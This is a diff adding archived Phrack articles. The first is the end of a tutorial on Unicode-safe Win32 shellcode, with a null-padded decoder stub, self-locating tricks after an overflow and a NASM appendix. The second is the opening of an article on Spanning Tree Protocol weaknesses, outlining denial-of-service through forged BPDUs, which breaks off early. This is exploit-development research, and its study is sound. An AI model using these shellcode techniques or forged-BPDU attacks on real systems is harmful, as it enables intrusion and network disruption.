+Then we must have EBX = 0x00000000, so that the loop works properly.
+->It is also easy to do.
+Finally we must have EAX pointing to our shellcode in order to take away 
+the nulls. 
+->This will be the harder part of the job, so we will see that later.
+
+Assuming EAX points to our code, we can build a header that will clean the
+code that follows it from nulls (we use add [ebp+0x0],al to align nulls) :
+
+-> 1st part : we do EBX=0x00000000, and ECX=0x00000500 (approximative size 
+of buffer)
+
+ ________________________________________________________________
+|6A00              push dword 0x00000000                         |
+|6A00              push dword 0x00000000                         |
+|5D                pop ebx                                       |
+|004500            add [ebp+0x0],al                              |
+|59                pop ecx                                       |
+|004500            add [ebp+0x0],al                              |
+|BA00050041        mov edx,0x41000500                            |
+|00F5              add ch,dh                                     |
+|________________________________________________________________|
+
+-> 2nd part : The patching of the 'loop code' :
+43 00 14 00 88 00 18 00 F7 has to be : 43 8A 14 58 88 14 18 E2 F7
+So we need to patch 4 bytes exactly which is simple :
+
+(N.B : using {add dword [eax],0x00??00??} takes more bytes so we will
+use a single byte mov : {mov byte [eax],0x??} to do this)
+
+ ________________________________________________________________
+|mov byte [eax],0x8A                                             |
+|inc eax                                                         |
+|inc eax                                                         |
+|mov byte [eax],0x58                                             |
+|inc eax                                                         |
+|inc eax                                                         |
+|mov byte [eax],0x14                                             |
+|inc eax                                                         |
+|                  ; one more inc to get EAX to the shellcode    |
+|________________________________________________________________|
+
+Which does, with 'align' instruction {add [ebp+0x0],al} :
+ ________________________________________________________________
+|004500            add [ebp+0x0],al                              |
+|C6008A            mov byte [eax],0x8A   ; 0x8A                  |
+|004500            add [ebp+0x0],al                              |
+|                                                                |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|C60058            mov byte [eax],0x58   ; 0x58                  |
+|004500            add [ebp+0x0],al                              |
+|                                                                |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|C60014            mov byte [eax],0x14   ; 0x14                  |
+|004500            add [ebp+0x0],al                              |
+|                                                                |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|C600E2            mov byte [eax],0xE2   ; 0xE2                  |
+|004500            add [ebp+0x0],al                              |
+|40                inc eax                                       |
+|004500            add [ebp+0x0],al                              |
+|________________________________________________________________|
+
+This is good, we now have EAX that points to the end of the loop, that is
+to say : the shellcode.
+
+-> 3rd part : The loop code (stuffed with nulls of course)
+ ________________________________________________________________
+|43                db 0x43                                       |
+|00                db 0x00      ; overwritten with 0x8A          |
+|14                db 0x14                                       |
+|00                db 0x00      ; overwritten with 0x58          |
+|88                db 0x88                                       |
+|00                db 0x00      ; overwritten with 0x14          |
+|18                db 0x18                                       |
+|00                db 0x00      ; overwritten with 0xE2          |
+|F7                db 0xF7                                       |
+|________________________________________________________________|
+
+Just after this should be placed the original working shellcode.
+
+
+
+Let's count the size of this header : (nulls don't count of course)
+
+   1st part : 10 bytes
+   2nd part : 27 bytes
+   3rd part :  5 bytes
+   -------------------
+      Total : 42 bytes
+
+I find this affordable, because i could manage to make a remote Win32
+shellcode fit in around 450 bytes.
+
+So, at the end, we made it : a shellcode that works after it has been
+turn into a unicode string !
+
+Is this really it ? No of course, we forgot something. I wrote that we
+assumed that EAX was pointing on the exact first null byte of the loop
+code. But in order to be honest with you, i will have to explain a way
+to obtain this.
+
+
+--[ 5 - Captain, we don't know our position !
+
+
+The problem is simple : We had to perform patches on memory to get our loop
+working well. So we need to know our position in memory because we are
+patching ourself.
+In an assembly program, an easy way to do this would be :
+
+ ________________________________________________________________
+|call label                                                      |
+|                                                                |
+|          label:                                                |
+|pop eax                                                         |
+|________________________________________________________________|
+
+Will get the absolute memory address of label in EAX.
+
+In a classic shellcode we will need to do a call to a lower address
+to avoid null bytes :
+
+ ________________________________________________________________
+|jmp jump_label                                                  |
+|                                                                |
+|          call_label:                                           |
+|pop eax                                                         |
+|push eax                                                        |
+|ret                                                             |
+|          jump_label:                                           |
+|call call_label                                                 |
+|                              ; ****                            |
+|________________________________________________________________|
+
+Will get the absolute memory address of '****'
+
+But this is impossible in our case because we can't jump nor call.
+Moreover, we can't parse memory looking for a signature of any kind.
+I'm sure there must be other ways to do this but i could only 3 :
+
+
+-> 1st idea : we are lucky.
+
+If we are lucky, we can expect to have some registers pointing to a place
+near our evil code. In fact, this will happen in 90% of time. This place
+can't be considered as harcoded because it will surely move if the process
+memory moves, from a machine to another. (The program, before it crashed,
+must have used your data and so it must have pointers to it)
+We know we can add anything to eax (only eax)
+so we can :
+
+     - use XCHG to have the approximate address in EAX
+     - then add a value to EAX, thus moving it to wherever we want.
+
+The problem is that we can't use : add al,r8 or and ah,r8, because don't
+forget that : 
+EAX=0x000000FF + add al,1 = EAX=0x00000000
+So thoses manipulations will do different things depending on what EAX 
+contains.
+
+So all we have is : add eax,0x??00??00
+No problem, we can add 0x1200 (for example) to EAX with : 
+
+ ________________________________________________________________
+|0500110001        add eax,0x01001100                            |
+|05000100FF        add eax,0xFF000100                            |
+|________________________________________________________________|
+
+Then, it is simple to add some align data so that EAX points on what we
+want.
+For example : 
+ ________________________________________________________________
+|0400              add al,0x0                                    |
+|________________________________________________________________|
+
+would be perfect for align.
+(N.B: we will maybe need a little inc EAX to fit)
+
+Some extra space may be requiered by this methode (max : 128 bytes because
+we can only get EAX to point to the nearest address modulus 0x100, then we
+have to add align bytes. As each 2 bytes is in fact 1 buffer byte because
+of the added null bytes, we must at worst add 0x100 / 2 = 128 bytes)
+
+
+-> 2nd idea : a little less lucky.
+
+If you can't find a close address within yours registers, you can maybe
+find one in the stack. Let's just hope your ESP wasn't smashed after the
+overflow.
+You just have to POP from the stack until you find a nice address. This
+methode can't be explained in a general way, but the stack always contains
+addresses the application used before you bothered it. Note that you can
+use POPAD to pop EDI, ESI, EBP, EBX, EDX, ECX, and EAX.
+Then we use the same methode as above.
+
+
+
+-> 3rd idea : god forgive me.
+
+Here we suppose we don't have any interesting register, or that the values
+that the registers contain change from a try to another. Moreover, there's
+nothing interesting inside the stack. 
+
+This is a desperate case so -> we use an old style samoura suicide attack.
+
+My last idea is to :
+
+     - Take a "random" memory location that has write access
+     - Patch it with 3 bytes
+     - Call this location with a relative call
+
+First part is the more hazardous : we need to find an address that is 
+within a writeable section. We'd better find one at the end of a section
+full on nulls or something like that, because we're gonna call quite
+randomly. The easiest way to do this is to take for example the .data
+section of the target Portable Executable. It is usually a quite large
+section with Flags : Read/Write/Data.
+So this is not a problem to kind of 'hardcode' an address in this area.
+So for the first step we just pisk an address in the middle of this,
+it won't matter where.
+(N.B : if one of your register points to a valid location after the
+overflow, you don't have to do all this of course)
+We assume the address is 0x004F1200 for example :
+
+Using what we saw previously, it is easy to set EAX to this address :
+ ________________________________________________________________
+|B8004F00AA        mov eax,0xAA004F00        ; EAX = 0xAA004F00  |
+|50                push eax                                      |
+|4C                dec esp                                       |
+|58                pop eax                   ; EAX = 0x004F00??  |
+|B000              mov al,0x0                ; EAX = 0x004F0000  |
+|B9001200AA        mov ecx,0xAA001200                            |
+|00EC              add ah,ch                                     |
+|                                   ; finally : EAX = 0x004F1200 |
+|________________________________________________________________|
+
+
+Then we will patch this writeable memory location with (guess what) :
+ ________________________________________________________________
+|pop eax                                                         |
+|push eax                                                        |
+|ret                                                             |
+|________________________________________________________________|
+
+Hex code of the patch : [58 50 C3]
+
+This would give us, after we called this address, a pointer to our code in
+EAX. This would be the end of the trouble. So let's patch this :
+
+Remember that EAX contains the address we are patching. What we are going
+to do is first patch with 58 00 C3 00 then move EAX 1 byte ahead, and put
+the last byte : 0x50 between the two others.
+(N.B : don't forget that byte are pushed in a reverse order in the stack)
+
+ ________________________________________________________________
+|C7005800C300      mov dword [eax],0x00C30058                    |
+|40                inc eax                                       |
+|C60050            mov byte [eax],0x50                           |
+|________________________________________________________________|
+
+Done with patching. Now we must call this location. I no i said that we
+couldn't call anything, but this is a desperate case, so we use a 
+relative call :
+
+ ________________________________________________________________
+|E800??00!!        call (here + 0x!!00??00)                      |
+|                                       (**)                     |
+|________________________________________________________________|
+
+In order to get this methode working, you have to patch the end of a large
+memory section containing nulls for example. Then we can call anywhere in
+the area, it will end up executing our 3 bytes code.
+
+After this call, EAX will have the address of (**), we are saved because we
+just need to add EAX a value we can calculate because it is just a
+difference between two offsets of our code. Therefore, we can't use
+previous technique to add bytes to EAX because we want to add less then
+0x100. So we can't do the {add eax, imm32} stuff. Let's do something else :
+
+              add dword [eax], byte 0x?? 
+
+is the key, because we can add a byte to a dword, this is perfect.
+
+EAX points to (**), se can can use this memory location to set the new EAX
+value and put it back into EAX. We assume we want to add 0x?? to eax :
+(N.B : 0x?? can't be larger than 0x80 because the :
+              add dword [eax], byte 0x?? 
+we are using is signed, so if you set a large value, it will sub instead of 
+add. (Then add a whole 0x100 and add some align to your code but this won't
+happen as 42*2 bytes isn't large enough i think)
+ ________________________________________________________________
+|0400              ad al,0x0       ; the 0x04 will be overwritten|
+|8900              mov [eax],eax                                 |
+|8300??            add dword [eax],byte 0x??                     |
+|8B00              mov eax,[eax]                                 |
+|________________________________________________________________|
+
+Everything is alright, we can make EAX point to the exact first null byte 
+of loop_code as we wished.
+We just need to calculate 0x?? (just count the bytes including nulls 
+between loop_code and the call and you'll find 0x5A)
+
+
+
+
+--[ 6 - Conclusion
+
+Finally, we could make a unishellcode, that won't be altered after a 
+str to unicode transformation.
+I'm waiting other ideas or techniques to perform this, i'm sure there
+are plenty of things i haven't thought about.
+
+
+
+Thanks to : 
+            - NASM Compiler and disassembler (i like its style =)
+            - Datarescue IDA
+            - Numega SoftIce
+            - Intel and its processors
+
+Documentation :
+	    - http://www.intel.com     for the official intel assembly doc
+
+Greetings go to : 
+            - rix, for showing us beautiful things in his articles
+	    - Tomripley, who always helps me when i need him !
+
+
+
+--| 7 - Appendix : Code
+
+
+For test purpose, i give you a few lines of code to play with (NASM style)
+It is not really a code sample, but i gathered all my examples so that you
+don't have to look everywhere in my messy paper to find what you need...
+
+- main.asm ----------------------------------------------------------------
+%include "\Nasm\include\language.inc"
+
+[global main]
+        
+segment .code public use32
+..start:
+
+; *********************************************
+; *   Assuming EAX points to (*) (see below)  *
+; *********************************************
+
+;
+; Setting EBX to 0x00000000 and ECX to 0x00000500
+;
+push byte 00	      ; 6A00
+push byte 00	      ; 6A00
+pop ebx               ; 5D
+add [ebp+0x0],al      ; 004500
+pop ecx               ; 59
+add [ebp+0x0],al      ; 004500
+mov edx,0x41000500    ; BA00050041
+add ch,dh             ; 00F5
+
+
+;
+; Setting the loop_code
+;
+add [ebp+0x0],al      ; 004500
+mov byte [eax],0x8A   ; C6008A
+add [ebp+0x0],al      ; 004500
+
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+mov byte [eax],0x58   ; C60058
+add [ebp+0x0],al      ; 004500
+
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+mov byte [eax],0x14   ; C60014
+add [ebp+0x0],al      ; 004500
+
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+mov byte [eax],0xE2   ; C600E2
+add [ebp+0x0],al      ; 004500
+inc eax               ; 40
+add [ebp+0x0],al      ; 004500
+
+;
+; Loop_code
+;
+
+db 0x43 
+db 0x00 ;0x8A         (*)
+db 0x14 
+db 0x00 ;0x58
+db 0x88 
+db 0x00 ;0x14 
+db 0x18 
+db 0x00 ;0xE2 
+db 0xF7
+
+; < Paste 'unicode' shellcode there >
+
+-EOF-----------------------------------------------------------------------
+
+Then the 3 methodes to get EAX to point to the chosen code.
+(N.B : The 'main' code is 42*2 = 84 bytes long)
+
+- methode1.asm ------------------------------------------------------------
+; *********************************************
+; *        Adjusts EAX (+ 0xXXYY bytes)       *
+; *********************************************
+
+; N.B : 0xXX != 0x00
+
+add eax,0x0100XX00    ; 0500XX0001
+add [ebp+0x0],al      ; 004500
+add eax,0xFF000100    ; 05000100FF
+add [ebp+0x0],al      ; 004500
+
+                            ; we added 0x(XX+1)00 to EAX
+
+; using : add al,0x0 as a NOP instruction :
+add al,0x0            ; 0400
+add al,0x0            ; 0400
+add al,0x0            ; 0400
+; [...]   <--  (0x100 - 0xYY) /2  times
+add al,0x0            ; 0400
+add al,0x0            ; 0400
+add al,0x0            ; 0400
+
+; (N.B) if 0xYY is odd then add a :
+dec eax               ; 48
+add [ebp+0x0],al      ; 004500
+-EOF-----------------------------------------------------------------------
+
+
+
+- methode2.asm ------------------------------------------------------------
+; *********************************************
+; *         Basically : POPs and XCHG         *
+; *********************************************
+
+popad                 ; 61
+add [ebp+0x0],al      ; 004500
+xchg eax, ?           ; 1 non null byte    (find out what to do here)
+add [ebp+0x0],al      ; 004500
+
+; do it again if needed, then use methode1 to make everything okay
+-EOF-----------------------------------------------------------------------
+
+
+
+- methode3.asm ------------------------------------------------------------
+; *********************************************
+; *                Using a CALL               *
+; *********************************************
+
+; Get the wanted address
+
+mov eax,0xAA00??00         ; B800??00AA
+add [ebp+0x0],al           ; 004500
+push eax                   ; 50
+add [ebp+0x0],al           ; 004500
+dec esp                    ; 4C
+add [ebp+0x0],al           ; 004500
+pop eax                    ; 58
+add [ebp+0x0],al           ; 004500
+mov al,0x0                 ; B000
+mov ecx,0xAA00!!00         ; B900!!00AA
+add ah,ch                  ; 00EC
+add [ebp+0x0],al           ; 004500
+
+; EAX = 0x00??!!00
+
+; awfull patch, i agree
+mov dword [eax],0x00C30058 ; C7005800C300
+inc eax                    ; 40
+add [ebp+0x0],al           ; 004500
+mov byte [eax],0x50        ; C60050
+add [ebp+0x0],al           ; 004500
+
+          ; just pray and call
+
+call 0x????????            ; E800!!00??
+
+add [ebp+0x0],al           ; 004500
+
+; then add 90d = 0x5A to EAX (to reach (*), where the loop_code is)
+; case where 0xXX = 0x00 so we can't use methode1
+
+add al,0x0                 ; 0400     because we're patching at [eax]
+
+mov [eax],eax              ; 8900
+add dword [eax],byte 0x5A  ; 83005A
+add [ebp+0x0],al           ; 004500
+mov eax,[eax]              ; 8B00
+
+; EAX pointes to the very first null byte of loop_code
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/12.txt b/phrack61/12.txt
new file mode 100644
index 0000000..76923e3
--- /dev/null
+++ b/phrack61/12.txt
@@ -0,0 +1,711 @@
+                            ==Phrack Inc.==
+
+                Volume 0x0b, Issue 0x3d, Phile #0x0c of 0x0f
+
+|=---------------=[ Fun with the Spanning Tree Protocol ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------=[ Oleg K. Artemjev, Vladislav V. Myasnyankin ]=------------=|
+
+ 
+Introduction.
+*=*=*=*=*=*=*
+
+Developed in the 1st part of 80th by International Standards Organization (ISO) 
+seven-layer model of Open System Interconnection (OSI) presents a hierarchical 
+structure, where each level has strictly assigned job & interface to upper & 
+lower levels. Due to business needs modern equipment currently supports on the 
+2nd OSI layer not only traditional frame forwarding & hardware address
+resolution, but also provides redundancy, multiplexing, load balancing &
+separation of information flows. Unfortunately, security issues at this layer
+are often left without attention. Here we'll show weakness in implementation
+and algorithm of one of the second OSI layer (``channel'' (MAC+LLC))
+protocols - Spanning Tree Protocol (STP). This work uses our materials
+published in Russian: [2], [4].
+ 
+   Since we're publishing an information about security vulnerabilities before
+a fix is ready on the market & since these information may be used by a
+malicious person we'll write our article in such a way, so newbies (also known
+as ``script kiddies'' or ``black hats'' -  see [1]) would be unable to use
+this paper as a step-by-step  ``howto''. We understand that different people
+have different opinion to this issue, but feel that this is almost single
+possible way to stimulate vendors to fix bugs much faster. Of course we
+already notified some vendors (Cisco, Avaya) about these vulnerabilities, but
+an answer was  alike: ``unless this gives money we won't make investments''.
+Well, since  we're interested in high level of security in switches & routers
+we use, we have to publish our investigations - thus we 'll make some pressure
+on hardware vendors to implement real security in their devices. Also we note,
+ that vendors should be already informed via bugtraq & some - Cisco & Avaya -
+directly. Our first publication in Russian concerning STP vulnerabilities was
+made about one year ago.
+ 
+   The volume of our materials written while analyzing STP protocol is too big
+to be published in one magazine article. Full information is available in the
+Internet at the project's web page ([3]) and with the same restrictions which
+apply also to this publication (see license below).
+
+License.
+*=*=*=*=
+
+   As a complain against trends to inhibit publications of security
+vulnerabilities in software (these tendencies are widely known to the public
+as a DMCA law in U$ [Digital Millennium Copyright Act]), these materials are a
+subject to the following license:
+
+--------------------------------------------------------------------------------
+License agreement.
+
+This paper is an intellectual property of it's authors: Oleg Artemjev and
+Vladislav Myasnyankin (hereinafter - writers). This paper may be freely used
+for the links, but its content or its part cannot be translated into foreign
+languages or included into any paper, book, magazine, and other electronic or
+paper issues without prior WRITTEN permissions of both writers. Moreover, in
+case of using materials of this research or refer to it, according given
+license you must provide complete information: full title, authorship and this
+license. You can freely distribute this paper electronically, if, and only if,
+all of the following conditions are met:
+  
+ 1. This license agreement and article are not modified,  including its PGP
+    digital signature. Any reformatting of the text is prohibited. 
+ 2. The distribution does not contradict the given license. 
+ 
+   Distribution of this paper in the countries with the legislation containing
+limitations similar to American DMCA contradicts the given license. At the
+moment of publication this includes United States of America (including
+embassies,naval vessels, military bases and other areas of  US jurisdiction.
+Moreover, reading this paper by citizens of such a country violates this
+license agreement and may also violate their law. Nevertheless, distribution
+of any links to this document is not a violation of the given license. 
+ 
+   This paper is provided by the authors ``as is'' and any express or implied
+warranties, including, but not limited to, the implied warranties of
+merchantability and fitness for a particular purpose are disclaimed. In no
+event shall the writers be liable for any direct,indirect, incidental,
+special, exemplary, or consequential damages (including, but not limited to,
+procurement of substitute goods or services; loss of use, data, or profits; or
+business interruption). 
+ 
+   Writers claim this article for educational purposes only. You should not
+read this paper, if you disagree not to use it any other way. 
+ 
+   The given license agreement is subject to change without warning in the
+consent of both writers. 
+--------------------------------------------------------------------------------
+
+What is STP?
+*=*=*=*=*=*=
+
+   Main task of STP protocol is automated management of network topology with
+redundant channels. In general, almost all type of networks are unable to
+accept loops(rings) in their structure. Really, if network equipment is
+connected with superfluous lines, then without additional measures frames
+would be delivered to recipient as a several one - this would result in a
+fault. But business require redundancy, thus there is an STP - it takes care
+that all physical loops are logically disabled unless one of lines gives a
+fault - in this case STP enables line that is currently in reserve. STP should
+guarantee that at each point of time only one of several duplicate links is
+enabled & should automatically switch between them on demand (fault or
+physical topology change).
+
+How STP works?
+*=*=*=*=*=*=*=
+
+   STP begin its work from building a tree-alike graph, which begins at 
+``root''. One of STP-capable devices becomes a root after winning elections.
+Each STP-capable device (it could be a switch, router or other equipment,
+hereby & later for simplicity called ``bridge'') starts from power-up claiming
+that it's root one by sending special data named Bridge Protocol Data Unit
+(BPDU - see [9]) through all ports.  The receiver's address in a BPDU packets
+is a group (multicast) address -  this allows BPDUs pass through
+non-intellectual (dumb) equipment like hubs and non STP-aware switches.
+ 
+   Here as we say ``address'', we mean MAC-address, since STP is working at 
+the level of Media Access Control (MAC). Thereby all issues about STP & its
+vulnerabilities apply equal to the different transmission methods, i.e. 
+Ethernet, Token Ring & others.
+ 
+   After receiving BPDU from other device the bridge compares received
+parameters with its own & depending to result decide to stop or keep insisting
+on its root status.  At the end of elections the device with the lowest value
+of the bride identifier becomes a root one. The bridge identifier is a
+combination of bridge MAC address & defined bridge priority. Obviously in a
+network with single STP compatible device it 'll be a root one.
+ 
+   Designated root (or ``Designated Root Bridge'', as named by standard)
+doesn't have any additional responsibilities - it only used as a beginning
+point to start building topology graph. For all other bridges in a network STP
+defines the ``Root Port'' - the nearest to the root bridge port. From other
+ports connected to the bridge it differs by its identifier - combination of
+its MAC address & defined for the port priority.
+ 
+   The Root Path Cost is also a value meaningful for STP elections - it is
+being build as a sum of path costs: to the root port of given bridge & all
+path costs to root ports of all other bridges on the route to Root one.
+ 
+   In addition to the ``main'' Root Bridge STP defines a logical entity called
+``Designated Bridge'' - owner of this status becomes main bridge in serving of
+given LAN segment. This is also a subject of elections.
+ 
+   Similarly STP defines for each network segment the Designated Port (which
+serving given network segment) & corresponding to it ``Designated Cost''.
+ 
+   After all the elections are finished, network goes into stable phase. This
+state is characterized by the following conditions:
+  
+ - There is only one device in a network claiming itself as a Root one, all
+   others are periodically announcing it. 
+
+ - The Root Bridge periodically sends BPDU through all its ports. The sending
+   interval is named ``Hello Time''. 
+
+ - In each LAN segment there is a single Designated Root Port and all traffic 
+   to the Root Bridge is going through it. Compared to other bridges, it has
+   lowest  value of path cost to the Root Bridge, if these values are
+   identical - the port with a lowest port identifier (MAC plus priority) is
+   assigned.  
+
+ - BPDUs are being received & sent by STP-compatible unit on each port, even
+   those that are disabled by STP protocol. Exceptionally, BPDUs are not
+   operationing on ports that are disabled by administrator. 
+
+ - Each bridge forwards frames only between Root Port & Designated Ports for
+   corresponding segments. All other ports are blocked. 
+
+   As follows from the last item, STP manages topology by changing port states
+within following list: 
+  
+Blocking:   The port is blocked (discards user frames), but accepts STP BPDUs.
+   
+Listening:  1st stage before forwarding. STP frames (BPDUs) are OK, but user 
+            frames are not processed. No learning of addresses yet, since it 
+            may give wrong data in  switching table at this time; 
+Learning:   2nd stage of preparation for forwarding state. BPDUs are processed
+            in full,  user frames are only used to build switching table and not
+            forwarded; 
+Forwarding: Working state of ports from user view - all frames are processed
+            - STP & user ones. 
+ 
+   At time of network topology reconfiguration all bridge ports are in one of
+three states - Blocking, Listening or Learning, user frames are not delivered
+& network is working only for itself, not for user.
+ 
+   In stable state all bridges are awaiting periodical Hello BPDUs from Root
+Bridge. If in the time period defined by Max Age Time there was no Hello BPDU,
+then bridge decides that either Root Bridge is Off, either the link to is
+broken. In this case it initiates network topology reconfiguration. By
+defining corresponding parameters it is possible to regulate how fast bridges
+will find topology changes & enable backup links.
+
+Lets look closer.
+*=*=*=*=*=*=*=*=*
+
+Here is a structure of STP Configuration BPDU according to 802.1d standard:
+
+ ----------------------------------------------
+ |Offset  |Name                       |Size   |
+ ----------------------------------------------
+ ----------------------------------------------
+ |1       |Protocol Identifier        |2 bytes|
+ ----------------------------------------------
+ |        |Protocol Version Identifier|1 byte |
+ ----------------------------------------------
+ |        |BPDU type                  |1 byte |
+ ----------------------------------------------
+ |        |Flags                      |1 byte |
+ ----------------------------------------------
+ |        |Root Identifier            |8 bytes|
+ ----------------------------------------------
+ |        |Root Path Cost             |4 bytes|
+ ----------------------------------------------
+ |        |Bridge Identifier          |8 bytes|
+ ----------------------------------------------
+ |        |Port Identifier            |2 bytes|
+ ----------------------------------------------
+ |        |Message Age                |2 bytes|
+ ----------------------------------------------
+ |        |Max Age                    |2 bytes|
+ ----------------------------------------------
+ |        |Hello Time                 |2 bytes|
+ ----------------------------------------------
+ |35      |Forward Delay              |2 bytes|
+ ----------------------------------------------
+
+In a C language:
+
+typedef struct {
+
+Bpdu_type  type;
+Identifier root_id;
+Cost       root_path_cost;
+Identifier bridge_id;
+Port_id    port_id;
+Time       message_age;
+Time       max_age;
+Time       hello_time;
+Time       forward_delay;
+Flag       topology_change_acknowledgement;
+Flag       topology_change;
+
+} Config_bpdu;
+
+
+Here is how it look like in a tcpdump:
+---------------------screendump----------------------------
+[root@ws002 root]# tcpdump -c 3 -t -i eth0 stp
+tcpdump: listening on eth0
+802.1d config 8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 age 0 max 20 hello 2 fdelay 15 
+802.1d config 8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 age 0 max 20 hello 2 fdelay 15 
+802.1d config 8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 age 0 max 20 hello 2 fdelay 15 
+3 packets received by filter
+0 packets dropped by kernel
+[root@ws002 root]#
+---------------------screendump----------------------------
+
+And with extra info:
+
+---------------------screendump----------------------------
+[root@ws002 root]# tcpdump -vvv -e -l -xX -ttt -c 3 -i eth0 stp
+tcpdump: listening on eth0
+000000 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \
+8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \
+age 0 max 20 hello 2 fdelay 15 
+0x0000   4242 0300 0000 0000 8000 0050 e2bd 5840        BB.........P..X@
+0x0010   0000 0000 8000 0050 e2bd 5840 8002 0000        .......P..X@....
+0x0020   1400 0200 0f00 0000 0000 0000 0000 7800        ..............x.
+0x0030   0c00                                           ..
+2. 002912 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \
+8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \
+age 0 max 20 hello 2 fdelay 15 
+0x0000   4242 0300 0000 0000 8000 0050 e2bd 5840        BB.........P..X@
+0x0010   0000 0000 8000 0050 e2bd 5840 8002 0000        .......P..X@....
+0x0020   1400 0200 0f00 0000 0000 0000 0000 7800        ..............x.
+0x0030   0c00                                           ..
+2. 046164 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \
+8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \
+age 0 max 20 hello 2 fdelay 15 
+0x0000   4242 0300 0000 0000 8000 0050 e2bd 5840        BB.........P..X@
+0x0010   0000 0000 8000 0050 e2bd 5840 8002 0000        .......P..X@....
+0x0020   1400 0200 0f00 0000 0000 0000 0000 7800        ..............x.
+0x0030   0c00                                           ..
+3 packets received by filter
+0 packets dropped by kernel
+[root@ws002 root]# 
+---------------------screendump----------------------------
+
+Generally the same is achieved by multicast alias of tcpdump syntax (if you
+'ve no other multicast traffic in the target network:
+
+---------------------screendump----------------------------
+[root@ws002 root]# tcpdump -vvv -e -l -xX -ttt -c 3 -i eth0 multicast
+tcpdump: listening on eth0
+000000 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \
+8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \
+age 0 max 20 hello 2 fdelay 15 
+0x0000   4242 0300 0000 0000 8000 0050 e2bd 5840        BB.........P..X@
+0x0010   0000 0000 8000 0050 e2bd 5840 8002 0000        .......P..X@....
+0x0020   1400 0200 0f00 0000 0000 0000 0000 7800        ..............x.
+0x0030   0c00                                           ..
+2. 004863 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \
+8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \
+age 0 max 20 hello 2 fdelay 15 
+0x0000   4242 0300 0000 0000 8000 0050 e2bd 5840        BB.........P..X@
+0x0010   0000 0000 8000 0050 e2bd 5840 8002 0000        .......P..X@....
+0x0020   1400 0200 0f00 0000 0000 0000 0000 7800        ..............x.
+0x0030   0c00                                           ..
+2. 006193 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \
+8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \
+age 0 max 20 hello 2 fdelay 15 
+0x0000   4242 0300 0000 0000 8000 0050 e2bd 5840        BB.........P..X@
+0x0010   0000 0000 8000 0050 e2bd 5840 8002 0000        .......P..X@....
+0x0020   1400 0200 0f00 0000 0000 0000 0000 7800        ..............x.
+0x0030   0c00                                           ..
+3 packets received by filter
+0 packets dropped by kernel
+[root@ws002 root]#
+---------------------screendump----------------------------
+
+As you see here, normally STP frames are arriving approximately within 
+Hello Time (here is 2 seconds).
+
+
+
+STP & VLANs.
+*=*=*=*=*=*=
+
+   We 'd like to say some words about STP functioning specific to networks
+with virtual LANs (VLANs). Enabling this mode on a switch is logically
+equivalent to replacing it with a few (by number of VLANs) switches, even when
+physically there's no separation between VLANs media. It 'd be obvious to find
+there different STP trees, but this option is supported by only some
+equipment(i.e. Intel 460T supports only one STP tree for all VLANs; with
+Avaya's Cajun switches family you'll find separate Spanning Tree only in high
+models). These facts are  destroying a hope to localize possible STP attacks
+in one VLAN. But there are threats existing even with separate spanning trees
+per VLAN.
+ 
+   Some vendors realize in their devices extended STP-related futures,
+enhancing their abilities, like Spanning Tree Portfast in Cisco  (see [11]) &
+STP Fast Start in some 3Com switches  (see [12]). We'll show essence of them
+below. Also, some companies support their own implementation of STP, i.e. Dual
+Layer STP from Avaya. Plus, STP modifications functioning for other network
+types (i.e. DECnet). Here we'd like to point on their principle similarity and
+differ only in details and extended abilities (so, in Avaya Dual Layer STP
+trees could be terminated at the 802.1q-capable ports). All these
+implementation suffer from the same defects as their prototypes. Unpublished
+proprietary protocols give one more problem - only developers could solve
+their problems, since full reverse engineering (needed to provide good
+bug-fixing solutions) is much harder then small one required to realize
+attacks & by publishing results some would make an evidence of reverse
+engineering, which may be illegal.
+
+Possible attack schemes
+*=*=*=*=*=*=*=*=*=*=*=*
+
+   An idea of 1st group of attacks lies practically ``on the surface''.
+Essentially the principle of STP allows easily organize Denial of Service
+(DoS) attack. Really, as defined by standard, on Spanning Tree reconfiguration
+all ports of involved devices does not transfer user frames. Thus, to drop a
+network (or at least one of its segments) into unusable state it's enough to
+master STP-capable device(s) to do infinite reconfiguration. It could be
+realized by initiating elections of, for example, root bridge, designated
+bridge or root port - practically any of electional object. ``Fortunately''
+STP has no any authentication  allowing malicious users easily reach this by
+sending fake BPDU.
+
+   A program building BPDU could be written in any high level language having
+raw-socket interface (look at C sample and managing shell script at our
+project home page -  [5], [6]).  Another way - one may use standard utilities
+for managing Spanning Tree, i.e. from Linux Bridge project([13]),  but in this
+case its not possible to manipulate STP parameters with  values that doesn't
+fit into standard specification. Below we will examine base schemes of
+potentially possible attacks.
+
+Eternal elections.
+*=*=*=*=*=*=*=*=*=
+
